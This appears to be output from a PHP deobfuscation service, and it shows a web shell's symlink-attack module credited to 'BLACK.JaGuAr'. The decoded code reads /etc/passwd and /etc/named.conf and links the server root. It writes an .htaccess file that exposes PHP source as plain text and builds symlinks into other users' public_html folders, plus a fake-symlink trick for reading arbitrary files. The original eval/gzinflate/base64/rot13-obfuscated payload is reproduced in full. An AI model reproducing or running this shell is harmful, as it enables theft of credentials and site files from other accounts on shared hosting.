$site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domains[1][0]."</div>";
}


echo "
<tr>

<td>
<div class='d0main'><a target='_blank' href=http://www.".$domains[1][0]."/><font size=3 color=#0066FF>".$site." </font></a> </div>
</td>


<td><font size=3 color=#FF0000>".$user['name']."</font></td>






<td>
<a href='BJ/root/home/".$user['name']."/public_html' target='_blank'><font size=3 color=#0066FF>Symlink</font> </a>
</td>


</tr></div> ";


flush();
flush();

						}
					}
				}
				echo "</table>";
			}
			else
			{
					$TEST=@file('/etc/passwd');
					if ($TEST) 
					{
						@mkdir("BJ",0777);
						@chdir("BJ");
						execmd("ln -s / root");
						$file3 = 'Options all 
			 DirectoryIndex Sux.html 
			 AddType text/plain .php 
			 AddHandler server-parsed .php 
			  AddType text/plain .html 
			 AddHandler txt .html 
			 Require None 
			 Satisfy Any        
			';
						$fp3 = fopen('.htaccess','w');
						$fw3 = fwrite($fp3,$file3);
						@fclose($fp3);
						
						echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
						
						$file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
						//Output a line of the file until the end is reached
						while(!feof($file))
						{
							$s = fgets($file);
							$matches = array();
							$t = preg_match('/\/(.*?)\:\//s', $s, $matches);
							$matches = str_replace("home/","",$matches[1]);
							if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
								continue;
							echo "<tr><td align=center><font size=3 color=lime>" . $matches . "</td>";
						    echo "<td align=center><font size=3 color=lime><a href=/BJ/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
						}
						fclose($file);
						
						echo "</table>";
					}
					else
					{
						
						@mkdir("BJ",0777);
						@chdir("BJ");
						execmd("ln -s / root");
						$file3 = 'Options all 
			 DirectoryIndex Sux.html 
			 AddType text/plain .php 
			 AddHandler server-parsed .php 
			  AddType text/plain .html 
			 AddHandler txt .html 
			 Require None 
			 Satisfy Any        
			';
						$fp3 = fopen('.htaccess','w');
						$fw3 = fwrite($fp3,$file3);
						@fclose($fp3);
						
						echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
						
						$temp = "";
						$val1 = 0;
						$val2 = 1000;
						for(;$val1 <= $val2;$val1++) 
						{
							$uid = @posix_getpwuid($val1);
							if ($uid)
								 $temp .= join(':',$uid)."
";
						 }
						 echo '<br/>';
						 $temp = trim($temp);
						 
						 $file5 = fopen("test.txt","w");
						 fputs($file5,$temp);
						 fclose($file5);
						 
						 $file = fopen("test.txt", "r") or exit("Unable to open file!");
						 while(!feof($file))
						 {
						 	$s = fgets($file);
							$matches = array();
							$t = preg_match('/\/(.*?)\:\//s', $s, $matches);
							$matches = str_replace("home/","",$matches[1]);
							if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
								continue;
							echo "<tr><td align=center><font size=3 color=lime>" . $matches . "</td>";
						    echo "<td align=center><font size=3 color=lime><a href=/BJ/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
						 }
						fclose($file);
						echo "</table>";
						unlink("test.txt");
					}
				}
			}
			else if(isset($_GET["symlinkfile"])) 
			{
				if(!isset($_GET['file']))
				{
					?>
					<center>
					<form action="<?php echo $self; ?>">
					<input type="hidden" name="symlinkserver">
					<input type="hidden" name="symlinkfile">
					<input type="text" class="box" name="file" size="50" value="">
					<input type="submit" value="Create Symlink" class="but">
					</form></center>
					<br><br>
					<?php
				}
				else
				{
					$fakedir="cx";
					$fakedep=16;
					
					$num=0; // offset of symlink.$num
					
					if(!empty($_GET['file'])) $file=$_GET['file'];
					else if(!empty($_POST['file'])) $file=$_POST['file'];
					else $file="";
										
					if(empty($file))
						exit;
					
					if(!is_writable("."))
						die("not writable directory");
					
					$level=0;
					
					for($as=0;$as<$fakedep;$as++){
						if(!file_exists($fakedir))
							mkdir($fakedir);
						chdir($fakedir);
					}
					
					while(1<$as--) chdir("..");
					
					$hardstyle = explode("/", $file);
					
					for($a=0;$a<count($hardstyle);$a++){
					if(!empty($hardstyle[$a])){
						if(!file_exists($hardstyle[$a])) 
							mkdir($hardstyle[$a]);
						chdir($hardstyle[$a]);
						$as++;
					}
				}
			$as++;
			while($as--)
					chdir("..");
				
				@rmdir("fakesymlink");
				@unlink("fakesymlink");
				
				@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
				
				// this loop will skip allready created symlinks.
				while(1)
					if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
					else $num++;
				
				@unlink("fakesymlink");
				mkdir("fakesymlink");
					
				die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');
				
			}
		}
		else if(isset($_REQUEST["script"])) 
		{
		
			?>
			
			
			<center><table><tr><td><a href="<?php echo $self; ?>?manually&script&symlinkserver"><font color="#3366FF" size="4">| Do It Manually |</font></a></td>
		<td><a href="<?php echo $self; ?>?automatic&script&symlinkserver"><font color="#3366FF" size="4">| Do It Automatically |</font></a></td>
		</tr></table></center>
			<?php
			if(isset($_REQUEST['manually']))
			{
				if(!isset($_REQUEST['passwd']))
				{
				?>
				<center>
				<form action="<?php echo $self; ?>" method="post">
				<input type="hidden" name="manually">
				<input type="hidden" name="script">
				<input type="hidden" name="symlinkserver">
				<textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
				<input type="submit" value="Get Config" class="but">
				</form>
				</center>
				<?php
				}
				else
				{
					$getetc = trim($_REQUEST['passwd']);
					
					mkdir("JaGuAr");
					chdir("JaGuAr");
					
					$myfile = fopen("test.txt","w");
					fputs($myfile,$getetc);
					fclose($myfile);
						 
					$file = fopen("test.txt", "r") or exit("Unable to open file!");
					while(!feof($file))
					{
					 	$s = fgets($file);
						$matches = array();
						$t = preg_match('/\/(.*?)\:\//s', $s, $matches);
						$matches = str_replace("home/","",$matches[1]);
						if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
								continue;
							syml($matches,$matches);
					}
					fclose($file);
					unlink("test.txt");
					echo "<center><font color=#3366FF size=3>[ Done ]</font></center>";
					echo "<br><center><a href=JaGuAr target=_blank><font size=3 color=#3366FF>| Go Here |</font></a></center>"; 
				}
			}
			else if(isset($_REQUEST['automatic']))
			{
				$d0mains = @file("/etc/named.conf");
		
				if($d0mains)
				{
					mkdir("BLACK");
					chdir("BLACK");
										
					foreach($d0mains as $d0main)
					{
						if(eregi("zone",$d0main))
						{
							preg_match_all('#zone "(.*)"#', $d0main, $domains);
							flush();
								
							if(strlen(trim($domains[1][0])) > 2)
							{ 
								$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
								
								syml($user['name'],$domains[1][0]);					
							}
						}
					}
					echo "<center><font color=#3366FF size=3>[ Done ]</font></center>";
					echo "<br><center><a href=BLACK target=_blank><font size=3 color=#3366FF>| Go Here |</font></a></center>"; 
				}
				else
				{
					mkdir("JaGuAr");
					chdir("JaGuAr");
					$temp = "";
					$val1 = 0;
					$val2 = 1000;
					for(;$val1 <= $val2;$val1++) 
					{
						$uid = @posix_getpwuid($val1);
						if ($uid)
							$temp .= join(':',$uid)."
";
					 }
					 echo '<br/>';
					 $temp = trim($temp);
					 
					 $file5 = fopen("test.txt","w");
					 fputs($file5,$temp);
					 fclose($file5);
					 
					 $file = fopen("test.txt", "r") or exit("Unable to open file!");
					 while(!feof($file))
					 {
						$s = fgets($file);
						$matches = array();
						$t = preg_match('/\/(.*?)\:\//s', $s, $matches);
						$matches = str_replace("home/","",$matches[1]);
						if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
							continue;
						syml($matches,$matches);
					 }
					fclose($file);
					echo "</table>";
					unlink("test.txt");
					echo "<center><font color=#3366FF size=3>[ Done ]</font></center>";
					echo "<br><center><a href=JaGuAr target=_blank><font size=3 color=#3366FF>| Go Here |</font></a></center>"; 
				}
			}
		}
	}	
	}
	?>
	<font size="4" face="Times New Roman, Times, serif" color="#3366FF">
	<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><b>Coded By </b></p>
	</font>
	<font size="3" face="Times New Roman, Times, serif" color="#990000">
	<p align="center"></font><b>
	<font size="3" face="Times New Roman, Times, serif" color="#990000">
	<a href="http://www.facebook.com/black.jaguar.75"><font size="3" face="Times New Roman, Times, serif" color="#990000">BLACK</a></font><a href="http://www.facebook.com/black.jaguar.75"><font size="3" face="Times New Roman, Times, serif" color="#3366FF">.</font><font size="3" face="Times New Roman, Times, serif" color="#990000">JaGuAr</font></a><font size="3" face="Times New Roman, Times, serif" color="#990000"> 
	- YeMeN </font>
	<font size="3" face="Times New Roman, Times, serif" color="#FFFFFF">Hacker</font></b><font size="3" face="Times New Roman, Times, serif" color="#00CC00"><br>
	
		

Did this file decode correctly?

Original Code

<?php // This file is protected by BLACK.JaGuAr
$OOO0O0O00=__FILE__;$OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64');$OO00O0000=285532;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';

eval (gzinflate(base64_decode(str_rot13("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")))); ?>

Function Calls

gzinflate 1
str_rot13 1
urldecode 1
base64_decode 1

Variables

$O0O0000O0 OOO0000O0
$OO00O0000 285532
$OOO000000 ah6sbehqla4co_sad
$OOO0000O0 base64_decode
$OOO0O0O00 index.php

Stats

MD5 4ccae7b5505e0485080f1b19638254d8
Eval Count 1
Decode Time 110 ms